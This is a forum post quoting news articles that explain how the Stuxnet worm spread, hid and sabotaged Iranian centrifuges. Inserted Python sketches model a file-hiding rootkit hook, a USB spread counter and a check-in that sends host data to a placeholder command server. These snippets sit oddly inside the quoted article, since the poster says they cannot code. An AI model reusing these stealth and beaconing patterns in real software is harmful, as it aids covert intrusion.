Trajan
conscientia mille testes ("conscience is a thousand witnesses")
I am 'somewhat' computer literate. I can't write code or edit the registry, but I did wipe and reinstall my OS once, and I slept at a Holiday Inn.....
In any event, I find this fascinating, and this appears to be a great primer on how it works:
snip-
Stuxnet is not a virus, but a worm. Viruses piggyback on programs already resident in a computer. Worms are programs in their own right, which hide within a computer and stealthily propagate themselves onto other machines. After nearly a month of study, cybersecurity engineers determined that Stuxnet was designed to tamper with industrial systems built by the German firm Siemens by overriding their supervisory control and data acquisition (SCADA) protocols. Which is to say that, unlike most malware, which exists to manipulate merely virtual operations, Stuxnet would have real-world consequences: It wanted to commandeer the workings of a large, industrial facility, like a power plant, or a dam, or a factory. Exactly what kind of facility was still a mystery.
From the beginning, everything about Stuxnet was anomalous. Worms that tampered with SCADA are not unheard of, but are exceptionally rare. And as a physical piece of code, Stuxnet was enormous—weighing in at half a megabyte, it dwarfed the average piece of malware by many multiples. Finally, there was its infection radius. Stuxnet found its way onto roughly 100,000 computers worldwide; 60 percent of these were in Iran.
As a work of engineering, Stuxnet’s power and elegance made it even more intriguing. Most industrial systems are run on computers which use Microsoft’s Windows operating system. Hackers constantly probe software for what are known as “zero day” vulnerabilities, weak points in the code never foreseen by the original programmers. On a sophisticated and ubiquitous piece of software such as Windows, discovering even a single zero day vulnerability is extremely uncommon. The makers of Stuxnet found, and utilized, four of them. No one in cybersecurity had ever seen anything like it.
The worm gained initial access to a system through an ordinary USB drive. Picture what happens when you plug a flash drive into your computer. The machine performs a number of tasks automatically; one of them is pulling up icons to be displayed on your screen, representing the data on the drive. On an infected USB drive, Stuxnet exploited this routine to pull the worm onto the computer.
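To picture the shape of that flaw, here is a toy model only, not the actual Windows shortcut bug: an "icon renderer" that ends up executing code from the drive while it is merely trying to draw icons. The ".icon_handler.py" marker is invented for illustration.

```python
# Toy model of the bug class: "rendering" an item causes attacker code to load.
import os
import runpy

def render_icons(drive_path):
    """Simulate the OS routine that enumerates a drive to display its icons."""
    for name in os.listdir(drive_path):
        if name.endswith(".icon_handler.py"):      # invented marker
            # Merely drawing the icon runs code shipped on the drive.
            runpy.run_path(os.path.join(drive_path, name))
        else:
            print(f"drawing icon for {name}")

# render_icons("/media/usb0")  # simply viewing the drive would be enough
```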
The challenge is that once on the machine, the worm becomes visible to security protocols, which constantly query files looking for malware. To disguise itself, Stuxnet installed what’s called a “rootkit”—a piece of code that intercepts security queries and sends back false “safe” messages, indicating that the worm is innocuous.
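Roughly what that interception looks like, sketched at the user level in Python. The real Stuxnet rootkit sat in kernel-mode drivers; the file names below are just examples of things to hide.

```python
# Conceptual sketch of a rootkit trick: wrap the directory-listing call a
# scanner relies on and silently drop the worm's files from the answer.
import os

HIDDEN_NAMES = {"mrxcls.sys", "mrxnet.sys"}   # example file names to hide

_real_listdir = os.listdir

def hooked_listdir(path="."):
    """Return the genuine listing, minus anything on the hidden list."""
    return [name for name in _real_listdir(path)
            if name.lower() not in HIDDEN_NAMES]

os.listdir = hooked_listdir   # every later caller now gets the filtered view
```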
But installing a rootkit requires using drivers, of which Windows machines are well trained to be suspicious. Windows requires that all drivers provide verification that they’re on the up-and-up through presentation of a secure digital signature. These digital keys are closely guarded secrets. Stuxnet’s malicious drivers presented genuine signatures from two genuine computer companies, Realtek Semiconductor and JMicron Technology. Both firms have offices in the same facility, Hsinchu Science Park, in Taiwan. Either by electronic trickery or a brick-and-mortar heist job, the creators of Stuxnet stole these keys—and in a sophisticated enough manner that no one knew they had been compromised.
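Why a stolen signing key defeats that check, shown with a simplified stand-in for the real mechanism (Windows actually uses Authenticode; this just uses a throwaway RSA key pair and the third-party "cryptography" package).

```python
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa

# The vendor's key pair: Windows trusts the public half via the vendor's
# certificate, and the private half is the "closely guarded secret".
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()

driver_image = b"...rootkit driver bytes..."

# Attacker signs the malicious driver with the stolen private key.
signature = private_key.sign(driver_image, padding.PKCS1v15(), hashes.SHA256())

# The loader-side check: verify() raises on a bad signature and passes
# silently on a good one. It cannot tell a stolen key from an honest one.
public_key.verify(signature, driver_image, padding.PKCS1v15(), hashes.SHA256())
print("driver accepted: signature verifies against the trusted vendor key")
```

The check only proves "signed by the holder of this key", not "signed by someone trustworthy", which is why the theft had to stay undetected.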
So to recap: The security keys enable the drivers, which allow the installation of the rootkit, which hides the worm that was delivered by the corrupt USB drive. Stuxnet’s next job was to propagate itself efficiently but quietly. Whenever another USB drive was inserted into an infected computer, it became infected, too. But in order to reduce traceability, Stuxnet allowed each infected USB drive to pass the worm onto only three computers.
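The three-hop quota is easy to picture as a small counter riding along on each infected drive. A made-up sketch (the state file name and format are invented for illustration):

```python
# Each drive carries a hop counter; it is decremented per successful hop,
# so one drive seeds at most three machines.
import json
import os

MAX_HOPS_PER_DRIVE = 3
STATE_FILE = "payload_state.json"        # hypothetical hidden state file

def infect_drive(drive_path):
    """Place the payload plus a fresh hop counter onto a newly inserted drive."""
    with open(os.path.join(drive_path, STATE_FILE), "w") as f:
        json.dump({"hops_remaining": MAX_HOPS_PER_DRIVE}, f)

def try_infect_host_from_drive(drive_path):
    """Infect the host only if this drive still has hops left in its quota."""
    state_path = os.path.join(drive_path, STATE_FILE)
    with open(state_path) as f:
        state = json.load(f)
    if state["hops_remaining"] <= 0:
        return False                     # quota used up: stay quiet
    state["hops_remaining"] -= 1
    with open(state_path, "w") as f:
        json.dump(state, f)
    # ...copy the worm onto this machine here...
    return True
```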
Stuxnet spread in other ways, too. It was not designed to propagate over the Internet at large, but could move across local networks using print spoolers. In any group of computers which shared a printer, when one computer became infected, Stuxnet quickly crawled through the printer to contaminate the others. Once it reached a computer with access to the Internet, it began communicating with command-and-control servers located in Denmark and Malaysia. (Whoever was running the operation took these servers offline after Stuxnet was discovered.) While they were functional, Stuxnet delivered information it had gathered about the systems it had invaded to the servers and requested updated versions of itself. Several different versions of Stuxnet have been isolated, meaning that the programmers were refining the worm, even after it was released.
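The check-in step, sketched loosely. The URL and message fields below are invented; the real command-and-control protocol was more involved than this.

```python
# Phone home: report what was found, ask whether a newer build exists.
import json
import platform
import urllib.request

CNC_URL = "http://cnc.example.invalid/checkin"   # placeholder address

def check_in(current_version, findings):
    report = {
        "version": current_version,
        "host": platform.platform(),
        "findings": findings,            # e.g. which SCADA software was seen
    }
    req = urllib.request.Request(
        CNC_URL,
        data=json.dumps(report).encode(),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req) as resp:
        answer = json.loads(resp.read())
    # If the operators have published a newer version, return where to get it.
    return answer.get("update_url") if answer.get("update_available") else None
```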
Finally, there’s the actual payload. Once a resident of a Windows machine, Stuxnet looked for WinCC and PCS 7 SCADA programs. If the machine had neither of these, then Stuxnet merely went about the business of spreading itself. But on computers with one of these two programs, Stuxnet began reprogramming the programmable logic controller (PLC) software and making changes in a piece of code called Organization Block 35. For months, no one knew exactly what Stuxnet was looking for with this block of code or what it intended to do once it found it. Three weeks ago, that changed.
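The targeting logic amounts to "look before you strike." A rough sketch: the program names come from the article, but the install-path detection used here is invented for illustration.

```python
# Do nothing destructive unless the Siemens software is actually present.
import os

TARGET_SOFTWARE = {
    "WinCC": r"C:\Program Files\Siemens\WinCC",     # hypothetical paths
    "PCS 7": r"C:\Program Files\Siemens\PCS7",
}

def find_scada_targets():
    """Return the names of any targeted Siemens packages found on this host."""
    return [name for name, path in TARGET_SOFTWARE.items()
            if os.path.isdir(path)]

def run():
    targets = find_scada_targets()
    if not targets:
        print("no target software found; just keep propagating")
    else:
        print(f"target software present ({targets}); rewrite PLC logic (e.g. OB35)")

run()
```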
As cybersecurity engineer Ralph Langner puts it, Stuxnet was one weapon with two warheads. The first payload was aimed at the Siemens S7-417 controller at Iran’s Bushehr nuclear power plant. The second targeted the Siemens S7-315 controller at the Natanz centrifuge operation, where uranium is processed and enriched. At Bushehr, Stuxnet likely attempted to degrade the facility’s steam turbine, with unknown results. But the attack on Natanz seems to have succeeded brilliantly.
Once again, Stuxnet’s design was unexpectedly elegant. With control of the centrifuge system at Natanz, the worm could have triggered a single, catastrophic incident. Instead, Stuxnet took over the centrifuge’s frequency converters during the course of everyday operation and induced tiny bursts of speed in the machinery, followed by abrupt decelerations. These speed changes stressed the centrifuge’s components. Parts wore out quickly, centrifuges broke mysteriously. The uranium being processed was corrupted. And all the while, Stuxnet kept sending normal feedback to the Iranians, telling them that, from the computer’s standpoint, the system was operating like clockwork. This slow burn went on for a year, with the Iranians becoming increasingly exasperated by what looked like sabotage, and smelled like sabotage, but what their computers assured them was perfectly routine.
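The sabotage-plus-spoofed-feedback pattern, as a toy simulation. All frequencies and timings below are invented; the point is the split between what the drive is told and what the operators are shown.

```python
# (1) Brief over- and under-speed excursions layered onto normal operation.
# (2) Falsified feedback so the operator display never shows them.
import random

NOMINAL_HZ = 1064.0                      # steady frequency shown to operators

def commanded_frequency(step):
    """What the sabotaged controller actually sends to the frequency converter."""
    if step % 1000 == 0:
        return NOMINAL_HZ * 1.3          # short burst well above normal speed
    if step % 1000 == 500:
        return NOMINAL_HZ * 0.1          # abrupt slow-down a little later
    return NOMINAL_HZ + random.uniform(-1.0, 1.0)

def reported_frequency():
    """What the monitoring screens are fed: plausible 'all is well' values."""
    return NOMINAL_HZ + random.uniform(-1.0, 1.0)

for step in range(1, 2001):
    actual = commanded_frequency(step)
    shown = reported_frequency()
    if abs(actual - NOMINAL_HZ) > 50:
        print(f"step {step}: drive commanded to {actual:.0f} Hz, "
              f"display shows {shown:.0f} Hz")
```

Spacing the excursions far apart is what made the damage look like random wear rather than an attack.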
I suggest reading the whole article at-
https://www.weeklystandard.com/articles/how-worm-turned_520704.html
What got me going on this (hence the thread title) was.....
Israeli Test on Worm Called Crucial in Iran Nuclear Delay
By WILLIAM J. BROAD, JOHN MARKOFF and DAVID E. SANGER
Published: January 15, 2011
snip-
The project’s political origins can be found in the last months of the Bush administration. In January 2009, The New York Times reported that Mr. Bush authorized a covert program to undermine the electrical and computer systems around Natanz, Iran’s major enrichment center. President Obama, first briefed on the program even before taking office, sped it up, according to officials familiar with the administration’s Iran strategy. So did the Israelis, other officials said. Israel has long been seeking a way to cripple Iran’s capability without triggering the opprobrium, or the war, that might follow an overt military strike of the kind they conducted against nuclear facilities in Iraq in 1981 and Syria in 2007.
http://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html?_r=1&pagewanted=all
